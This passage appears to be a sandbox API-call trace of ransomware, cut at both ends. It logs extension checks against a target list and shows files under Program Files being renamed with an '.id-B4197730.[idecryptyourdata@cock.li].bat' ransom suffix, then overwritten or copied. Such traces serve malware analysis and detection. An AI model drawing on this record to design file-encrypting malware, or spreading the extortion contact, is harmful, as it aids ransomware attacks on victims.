(lpString1=".ppt", lpString2=".dll") returned 1 [0181.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.475] lstrlenW (lpString=".zip") returned 4 [0181.475] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.475] lstrlenW (lpString=".rar") returned 4 [0181.475] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.475] lstrlenW (lpString=".bz2") returned 4 [0181.475] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.475] lstrlenW (lpString=".7z") returned 3 [0181.475] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.475] lstrlenW (lpString=".dbf") returned 4 [0181.475] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.475] lstrlenW (lpString=".1cd") returned 4 [0181.475] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.475] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.475] lstrlenW (lpString=".jpg") returned 4 [0181.475] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.475] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0181.475] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0181.475] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.476] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=5967976) returned 1 [0181.476] CloseHandle (hObject=0x358) returned 1 [0181.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe")) returned 0x20 [0181.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0181.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.486] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fc64 | out: lpNewFilePointer=0x0) returned 1 [0181.486] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fc24 | out: lpNewFilePointer=0x0) returned 1 [0181.486] ReadFile (in: hFile=0x358, lpBuffer=0x426c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x389fc30, lpOverlapped=0x0 | out: lpBuffer=0x426c058*, lpNumberOfBytesRead=0x389fc30*=0x40000, lpOverlapped=0x0) returned 1 [0181.495] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x1e5acd, lpNewFilePointer=0x0, dwMoveMethod=0x389fc24 | out: lpNewFilePointer=0x0) returned 1 [0181.495] ReadFile (in: hFile=0x358, lpBuffer=0x42ac058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x389fc30, lpOverlapped=0x0 | out: lpBuffer=0x42ac058*, lpNumberOfBytesRead=0x389fc30*=0x40000, lpOverlapped=0x0) returned 1 [0181.571] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x389fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0181.572] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x571068, lpNewFilePointer=0x0, dwMoveMethod=0x389fc24 | out: lpNewFilePointer=0x0) returned 1 [0181.572] ReadFile (in: hFile=0x358, lpBuffer=0x42ec058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x389fc30, lpOverlapped=0x0 | out: lpBuffer=0x42ec058*, lpNumberOfBytesRead=0x389fc30*=0x40000, lpOverlapped=0x0) returned 1 [0181.734] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.735] WriteFile (in: hFile=0x358, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x389fca8, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fca8*=0xc0112, lpOverlapped=0x0) returned 1 [0181.751] SetEndOfFile (hFile=0x358) returned 1 [0181.751] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40000) returned 0x44850c8 [0181.756] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fc74 | out: lpNewFilePointer=0x0) returned 1 [0181.756] WriteFile (in: hFile=0x358, lpBuffer=0x44850c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x389fc80, lpOverlapped=0x0 | out: lpBuffer=0x44850c8*, lpNumberOfBytesWritten=0x389fc80*=0x40000, lpOverlapped=0x0) returned 1 [0181.757] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x1e5acd, lpNewFilePointer=0x0, dwMoveMethod=0x389fc74 | out: lpNewFilePointer=0x0) returned 1 [0181.757] WriteFile (in: hFile=0x358, lpBuffer=0x44850c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x389fc80, lpOverlapped=0x0 | out: lpBuffer=0x44850c8*, lpNumberOfBytesWritten=0x389fc80*=0x40000, lpOverlapped=0x0) returned 1 [0182.361] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x571068, lpNewFilePointer=0x0, dwMoveMethod=0x389fc74 | out: lpNewFilePointer=0x0) returned 1 [0182.361] WriteFile (in: hFile=0x358, lpBuffer=0x44850c8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x389fc80, lpOverlapped=0x0 | out: lpBuffer=0x44850c8*, lpNumberOfBytesWritten=0x389fc80*=0x40000, lpOverlapped=0x0) returned 1 [0182.364] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0182.367] CloseHandle (hObject=0x358) returned 1 [0182.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0182.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.367] lstrlenW (lpString=".doc") returned 4 [0182.367] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0182.367] lstrlenW (lpString=".docx") returned 5 [0182.367] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0182.367] lstrlenW (lpString=".pdf") returned 4 [0182.367] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0182.367] lstrlenW (lpString=".xls") returned 4 [0182.367] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0182.367] lstrlenW (lpString=".xlsx") returned 5 [0182.367] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0182.367] lstrlenW (lpString=".ppt") returned 4 [0182.368] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0182.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.368] lstrlenW (lpString=".zip") returned 4 [0182.368] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0182.368] lstrlenW (lpString=".rar") returned 4 [0182.368] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0182.368] lstrlenW (lpString=".bz2") returned 4 [0182.368] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0182.368] lstrlenW (lpString=".7z") returned 3 [0182.368] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0182.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.368] lstrlenW (lpString=".dbf") returned 4 [0182.368] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0182.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.368] lstrlenW (lpString=".1cd") returned 4 [0182.368] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0182.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.368] lstrlenW (lpString=".jpg") returned 4 [0182.368] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0182.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.368] lstrlenW (lpString=".doc") returned 4 [0182.368] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0182.368] lstrlenW (lpString=".docx") returned 5 [0182.368] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0182.368] lstrlenW (lpString=".pdf") returned 4 [0182.368] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0182.368] lstrlenW (lpString=".xls") returned 4 [0182.369] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0182.369] lstrlenW (lpString=".xlsx") returned 5 [0182.369] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0182.369] lstrlenW (lpString=".ppt") returned 4 [0182.369] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0182.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.369] lstrlenW (lpString=".zip") returned 4 [0182.369] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0182.369] lstrlenW (lpString=".rar") returned 4 [0182.369] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0182.369] lstrlenW (lpString=".bz2") returned 4 [0182.369] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0182.369] lstrlenW (lpString=".7z") returned 3 [0182.369] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0182.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.369] lstrlenW (lpString=".dbf") returned 4 [0182.369] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0182.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.369] lstrlenW (lpString=".1cd") returned 4 [0182.369] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0182.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 77 [0182.369] lstrlenW (lpString=".jpg") returned 4 [0182.369] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0182.369] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0182.370] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0182.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0182.730] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=503808) returned 1 [0182.730] CloseHandle (hObject=0x348) returned 1 [0182.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll")) returned 0x20 [0182.730] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.730] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.730] lstrlenW (lpString=".doc") returned 4 [0182.730] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString=".docx") returned 5 [0182.731] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0182.731] lstrlenW (lpString=".pdf") returned 4 [0182.731] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString=".xls") returned 4 [0182.731] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString=".xlsx") returned 5 [0182.731] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0182.731] lstrlenW (lpString=".ppt") returned 4 [0182.731] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.731] lstrlenW (lpString=".zip") returned 4 [0182.731] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString=".rar") returned 4 [0182.731] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString=".bz2") returned 4 [0182.731] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.731] lstrlenW (lpString=".7z") returned 3 [0182.731] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.731] lstrlenW (lpString=".dbf") returned 4 [0182.731] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.731] lstrlenW (lpString=".1cd") returned 4 [0182.731] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.731] lstrlenW (lpString=".jpg") returned 4 [0182.731] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.732] lstrlenW (lpString=".doc") returned 4 [0182.732] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.732] lstrlenW (lpString=".docx") returned 5 [0182.732] lstrcmpiW (lpString1=".docx", lpString2="k.dll") returned -1 [0182.732] lstrlenW (lpString=".pdf") returned 4 [0182.732] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.732] lstrlenW (lpString=".xls") returned 4 [0182.732] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.732] lstrlenW (lpString=".xlsx") returned 5 [0182.732] lstrcmpiW (lpString1=".xlsx", lpString2="k.dll") returned -1 [0182.732] lstrlenW (lpString=".ppt") returned 4 [0182.732] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.732] lstrlenW (lpString=".zip") returned 4 [0182.732] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.732] lstrlenW (lpString=".rar") returned 4 [0182.732] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.732] lstrlenW (lpString=".bz2") returned 4 [0182.732] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.732] lstrlenW (lpString=".7z") returned 3 [0182.732] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.733] lstrlenW (lpString=".dbf") returned 4 [0182.733] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.733] lstrlenW (lpString=".1cd") returned 4 [0182.733] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned 68 [0182.733] lstrlenW (lpString=".jpg") returned 4 [0182.733] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.733] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0182.733] lstrlenW (lpString="mshwgst.dll") returned 11 [0182.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0182.992] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=51200) returned 1 [0182.992] CloseHandle (hObject=0x38c) returned 1 [0182.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll")) returned 0x20 [0182.993] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.993] lstrlenW (lpString=".doc") returned 4 [0182.993] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.993] lstrlenW (lpString=".docx") returned 5 [0182.993] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0182.993] lstrlenW (lpString=".pdf") returned 4 [0182.993] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.993] lstrlenW (lpString=".xls") returned 4 [0182.993] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.993] lstrlenW (lpString=".xlsx") returned 5 [0182.993] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0182.993] lstrlenW (lpString=".ppt") returned 4 [0182.993] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.993] lstrlenW (lpString=".zip") returned 4 [0182.993] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.993] lstrlenW (lpString=".rar") returned 4 [0182.993] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.993] lstrlenW (lpString=".bz2") returned 4 [0182.993] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.993] lstrlenW (lpString=".7z") returned 3 [0182.993] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.993] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.994] lstrlenW (lpString=".dbf") returned 4 [0182.994] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.994] lstrlenW (lpString=".1cd") returned 4 [0182.994] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.994] lstrlenW (lpString=".jpg") returned 4 [0182.994] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.994] lstrlenW (lpString=".doc") returned 4 [0182.994] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString=".docx") returned 5 [0182.994] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0182.994] lstrlenW (lpString=".pdf") returned 4 [0182.994] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString=".xls") returned 4 [0182.994] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString=".xlsx") returned 5 [0182.994] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0182.994] lstrlenW (lpString=".ppt") returned 4 [0182.994] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.994] lstrlenW (lpString=".zip") returned 4 [0182.994] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString=".rar") returned 4 [0182.994] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0182.994] lstrlenW (lpString=".bz2") returned 4 [0182.994] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0182.995] lstrlenW (lpString=".7z") returned 3 [0182.995] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0182.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.995] lstrlenW (lpString=".dbf") returned 4 [0182.995] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0182.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.995] lstrlenW (lpString=".1cd") returned 4 [0182.995] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0182.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned 62 [0182.995] lstrlenW (lpString=".jpg") returned 4 [0182.995] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0182.995] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0182.995] lstrlenW (lpString="pidgenx.dll") returned 11 [0182.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0182.996] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=1475160) returned 1 [0182.996] CloseHandle (hObject=0x38c) returned 1 [0182.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll")) returned 0x20 [0182.997] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0182.997] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.997] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.997] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0182.998] GetLastError () returned 0x0 [0182.998] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0183.071] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0183.922] ReadFile (in: hFile=0x38c, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x68268, lpOverlapped=0x0) returned 1 [0184.260] WriteFile (in: hFile=0x390, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x68270, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x68270, 